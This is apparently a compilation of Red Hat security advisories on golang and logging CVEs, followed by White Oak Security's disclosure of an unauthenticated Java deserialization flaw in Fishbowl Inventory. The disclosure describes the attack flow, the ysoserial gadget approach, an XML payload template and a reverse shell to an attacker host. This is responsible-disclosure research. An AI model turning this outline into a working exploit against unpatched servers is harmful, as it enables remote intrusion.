LOG-2864 - [vector] Can not sent logs to default when loki is the default output in CLF  
LOG-2867 - [fluentd] All logs are sent to application tenant when loki is used as default logstore in CLF.  
LOG-2873 - [Vector] Cannot configure CPU/Memory requests/limits when using Vector as collector.  
LOG-2875 - Seeing a black rectangle box on the graph in Logs view  
LOG-2876 - The link to the 'Container details' page on the 'Logs' screen throws error  
LOG-2877 - When there is no query entered, seeing error message on the Logs view  
LOG-2882 - RefreshIntervalDropdown and TimeRangeDropdown always set back to its original values when switching between pages in 'Logs' screen

6. References:

https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2022-0759  
https://access.redhat.com/security/cve/CVE-2022-1012  
https://access.redhat.com/security/cve/CVE-2022-1292  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-1785  
https://access.redhat.com/security/cve/CVE-2022-1897  
https://access.redhat.com/security/cve/CVE-2022-1927  
https://access.redhat.com/security/cve/CVE-2022-2068  
https://access.redhat.com/security/cve/CVE-2022-2097  
https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-32250  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYv5/w9zjgjWX9erEAQhRBBAAiZe24VtCQruCG/MvGEOowBvHf/YNANlR  
N6WAw2VezEfvFkG7z599MWZVWz2jnZO6cn9i+CoNDanAmItPJ8ljK4sitrP2ywrG  
OKwqIa4DPrywFFTSMxemB604ewE0cvXifuqG5bQDn+GvndiV/u/XaVTYZseY1P5X  
8ZIJ20cxROOE9pg0/3eya27edZxDrgWx6BtzSEZw47ReV3Dogqy+KzRCAAoN+pE5  
g2t/E0u0Ypmjil9Ttsop/ejUg/iz8UTGtua4m1nzhZrsoE84p5xIgvCEkYlh3OrD  
tfawpj1r9Avcjk4zbZkAe/enSQZQv0iWD792SoP7/ddX5tIu05ArvPWj/NvN/rI4  
dFzMe2UmezuS2EQpzaWOug2xSQUbR1hI+Y4cy0YOHuwzeaMeoHSbNYTJmOxKR0v1  
44a9oSBku+Xfk8nUNqS+9oq0z3DlAWt2BjbfrJCbSjZQdOUOIGM95L3ClrXY9LYF  
PT5v+h2W4myonj6HVhkv+Wy7aRbYQ7Qhk/3AaN7Dz5soBSNK4exvOzWXGuf/BdSf  
XFef6O87ipZveHQYmTfH+t8aJV1plEVTrm8pyz2EfzCv1Fnhjn0rvbGZAFBlvqW+  
vhxoj505RQBBhcno16V1zczdd8KsiqY7aZniTuh2DQAVvNhqsHgn8rvQ7HJlExun  
eIFVKOxx310=ynB/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6051-01

Red Hat Security Advisory 2022-6113-01 - Red Hat Application Interconnect 1.0 introduces a service network, linking TCP and HTTP services across the hybrid cloud. A service network enables communication between services running in different network locations or sites. It allows geographically distributed services to connect as if they were all running in the same site. This is an update to the rpms for Red Hat Application Interconnect 1.0 to fix some security issues in the golang compiler.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat Application Interconnect 1.0 Release (rpms)  
Advisory ID:       RHSA-2022:6113-01  
Product:           Red Hat Application Interconnect  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6113  
Issue date:        2022-08-18  
CVE Names:         CVE-2022-1705 CVE-2022-1962 CVE-2022-28131  
                   CVE-2022-30630 CVE-2022-30631 CVE-2022-30632  
                   CVE-2022-30633 CVE-2022-32148  
====================================================================  
1. Summary:

Red Hat Application Interconnect 1.0 introduces a service network, linking  
TCP and HTTP services across the hybrid cloud.  
A service network enables communication between services running in  
different network locations or sites.  
It allows geographically distributed services to connect as if they were  
all running in the same site.

This is an update to the rpms for Red Hat Application Interconnect 1.0  
to fix some security issues in the golang compiler.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

2. Relevant releases/architectures:

8Base-Application-Interconnect-1 - x86_64

3. Description:

This release addresses several security issues in the underlying golang  
compiler by moving to golang version 1.17.12.

Security Fixes:

Important:  
- - golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

Moderate:  
- - golang: net/http: improper sanitization of Transfer-Encoding header  
(CVE-2022-1705)  
- - golang: go/parser: stack exhaustion in all Parse* functions  
(CVE-2022-1962)  
- - golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)  
- - golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)  
- - golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)  
- - golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)  
- - golang: net/http/httputil: NewSingleHostReverseProxy - omit  
X-Forwarded-For  
not working (CVE-2022-32148)

For more details about the security issue(s), including the impact; a CVSS  
score; acknowledgments; and other related information refer to the CVE  
page(s)  
listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read  
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob  
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header  
2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions  
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working  
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob  
2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip  
2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal

6. Package List:

8Base-Application-Interconnect-1:

Source:  
skupper-cli-1.0.2-2.el8.src.rpm

x86_64:  
skupper-cli-1.0.2-2.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1705  
https://access.redhat.com/security/cve/CVE-2022-1962  
https://access.redhat.com/security/cve/CVE-2022-28131  
https://access.redhat.com/security/cve/CVE-2022-30630  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-30632  
https://access.redhat.com/security/cve/CVE-2022-30633  
https://access.redhat.com/security/cve/CVE-2022-32148  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_application_interconnect

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYv5/vdzjgjWX9erEAQiB6g//UbjIL6OmAWLg0ZrxWiIoZCIaQxj5MO6U  
hYyH7+ni4zi0kzZRX3wRgE+UGactlpcxwGEVVAcRAGAaS6ZlUoizsX3mmRVJROaN  
pKfvj1LYigEwuCFBpDI+i76d9C7Sdqkby7HdRowMRLwIZ8kQCit0C6OL/q/ulN31  
LuPk9dj5cg6TT5ESYJKs+oiJg2pK/MTaAXhRhUsIA+K8pICtdDjqDvZ0qLJvbSjr  
eMhYR4sWwwFKKVcptfPmODQQw7GXCUbKrAYcUgjqjz+vTgSi1VPwdwXVcBeLqpr9  
NhXVbTCQzRCB6y1MKZohrLQFNXxn0H735cJXWEYeMre3+FJ6+carSyvcazXNc2Ta  
/ZZYSfQDK7Hag76rTRxhW0Oig4e/k4/Ipd9zX4pgbzp7Bxmyqk2fixi0mNkEeIOS  
jZfo35UHQvXFn58/LO+YSmeaJFGsJ74uwvabUiQEEVAGD1rOHeRGfKrirfhueyEy  
Z46akO8C5DB3v7CZHqP9RipQyr0z+PaCT24RA6wsadeLfDY3V8AdSsUBdsKhdNzX  
ySRYJ+mSWUU3MEyyHzmt9RUeFR5HkfZpb/xL/RMcrZLB6EWMdbsFPDTeqUnpqlpA  
7dp1RgyGzw3BZ+iYo0KgfGuyhgdZKXwoHubpIv5AbTGdJS0azs1Q+ddYLOikd/fa  
7VvQiybU3pg=AImo  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6113-01

A Java Deserialization vulnerability in the Fishbowl Server in Fishbowl Inventory before 2022.4.1 allows remote attackers to execute arbitrary code via a crafted XML payload.

**Finding A Shell In Your Fishbowl**

White Oak Security discovered an instance of Fishbowl Inventory that was vulnerable to a Java deserialization vulnerability, resulting in unauthenticated remote code execution. 

This issue has been remediated as of release 2022.4.1.

CVE-2022-29805 has been reserved for this vulnerability and is pending official publication.

**Disclosure Timeline**

Before we dive into the details, we want to give our thanks to the Fishbowl Inventory support and development team for their constant communication providing updates while disclosing this issue. Fishbowl Inventory responded promptly to the original disclosure request and resolved the issue in a timely manner which is a very refreshing and mature response from the organization. From our perspective, Fishbowl Inventory is doing everything right in this regard and we hope other organizations follow their lead. 

White Oak Security followed responsible disclosure guidelines by giving Fishbowl Inventory time to remediate this vulnerability and allow customers ample time to patch their instances.

**4/7/22**: Attempted to contact Fishbowl Inventory via online support ticket.

**4/8/22**: Received contact from Fishbowl Inventory. Disclosed vulnerability documentation via the support ticket.

**4/12/22**: Received confirmation that the vulnerability details have been transferred to the development team.

**4/13/22**: Development team confirms that the vulnerability is valid and they are working on a solution.

**4/25/22**: Patch released to the general public with version 2022.4.1.

**8/18/22:** White Oak Security publicly discloses the finding according to our vulnerability disclosure policy.

**Fishbowl Inventory Overview**

Fishbowl Inventory is an inventory management system that helps organize product inventory with accounting integrations and other necessary workflows. The application consists of a web server, inventory server, and desktop application to interact with the servers and perform the business logic. 

**Fishbowl Exposure**

Using Shodan, the Fishbowl Server can be found exposed on the internet on a handful of servers. White Oak Security confirmed that the vulnerable port (28192) was exposed on several hosts, however, White Oak Security did not attempt exploitation against any internet-facing host. 

As specified within the support library article below, the Fishbowl Server on port 28192 is exposed during default installations (1). Therefore, it is reasonable to assume that every internet-facing instance of Fishbowl, in its default configuration without additional firewall rules, would have been vulnerable to this exploit.

**Fishbowl Vulnerability Analysis**

The Fishbowl Server establishes a web server on 80/443 and a TCP Socket Server listening on port 28192 by default. This TCP Socket Server on port 28192 is the vulnerable service. We used Sysinternals TCPView (2) to view the local endpoints.

Analyzing the application installation, the Fishbowl Server Administration program controls the server port, default of 28192.

The Fishbowl Server handles all message processing as a TCP Socket Server. This socket server processes incoming data streams and determines if the data is either JSON or XML. In this vulnerability, we are interested in the XML flow. 

**Fishbowl Attack Flow**

The attack flow can be simplified as the following steps:

1.  TCP Socket Server parses incoming data streams; validates for JSON or XML data types
2.  In the XML flow, an XML document is built from the incoming data
3.  A custom XML parser is created which parses the XML structure, beginning with the root <event> tag
4.  The custom XML parser extracts data from the <head>, <user>, and <body> children elements.
5.  Within the <head> XML element parsing flow, the application base64 decodes a <src> child tag and converts the data within that <src> element into an arbitrary object input stream (using the Java readObject() function). 
6.  This directly leads to an exploitable deserialization condition as any arbitrary object can be provided in this element, such as an object which executes remote commands (called a Gadget Chain).

This is a typical Java Deserialization vulnerability and we should be able to use a pre-existing Gadget Chain using ysoserial (3). Additionally, a custom gadget could be created from pre-existing Fishbowl library objects but was unnecessary for exploitation at this time. For additional information about Java Deserialization vulnerabilities and gadget chains, check out the original research by Chris Frohoff.

The libraries within the Fishbowl Inventory application deployment include several references to the Apache Commons collections, which would allow us to use one of the payloads pre-existing in ysoserial (3).

The Socket Server parses XML data and performs a readObject() on various XML element byte streams. To exploit this issue, White Oak Security used ysoserial (3), a Java Deserialization exploitation kit, to generate a payload that will be deserialized by the application server to execute any command on the host. In this example, a simple PowerShell reverse shell is used to connect back to the target server.

The format of the payload is shown below, where the required event, head, and src fields are used. The payload is contained within the source element body.

    <?xml version='1.0' encoding='utf-8'?>
    <event>
    <head>
    <src name='xyz'>" + payload + "</src>
    </head>
    </event>

Next, a simple Java Socket client was created which connects to the vulnerable server and sends the Java Object as a DataOutputStream. The payload is decoded from XML and then has deserialization performed against many underlying XML child elements. In this example, the ‘src’ element is targeted.

The data is sent to the server and remote code execution is achieved, with a reverse shell (TCP connection) established from the Fishbowl Server to the attacker-controlled host.

**More From White Oak Security**

White Oak Security is a highly skilled and knowledgeable cyber security testing company that works hard to get into the minds of opponents to help protect those we serve from malicious threats through expertise, integrity, and passion.

Read more from White Oak Security’s pentesting team.

****Sources****

1.  https://help.fishbowlinventory.com/hc/en-us/articles/360042632634-Fishbowl-Hosted-Services – FIshbowl Inventory Server Ports Documentation
2.  https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview – Tool for local process analysis
3.  https://github.com/frohoff/ysoserial – Tool for Java Object Deserialization

Tag

#js